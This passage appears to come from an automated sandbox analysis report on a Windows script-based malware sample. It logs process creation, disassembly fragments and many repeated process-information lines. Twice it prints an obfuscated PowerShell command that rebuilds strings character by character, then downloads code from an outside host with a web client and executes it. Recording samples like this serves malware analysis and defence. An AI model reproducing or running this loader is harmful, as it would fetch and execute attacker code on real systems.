BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,u
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,u
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC480942 push E95B2DD0h; ret 2_2_00007FFAAC4809C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAC483332 push eax; retf 2_2_00007FFAAC483341
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07CF06E4 push es; iretd 10_2_07CF06EE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07CF5698 push esi; iretd 10_2_07CF56A6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07CF0648 push es; iretd 10_2_07CF0656
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07CF4E48 push eax; iretd 10_2_07CF500E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07CF5640 push esi; iretd 10_2_07CF564E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07CF5020 push ecx; iretd 10_2_07CF51CE
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
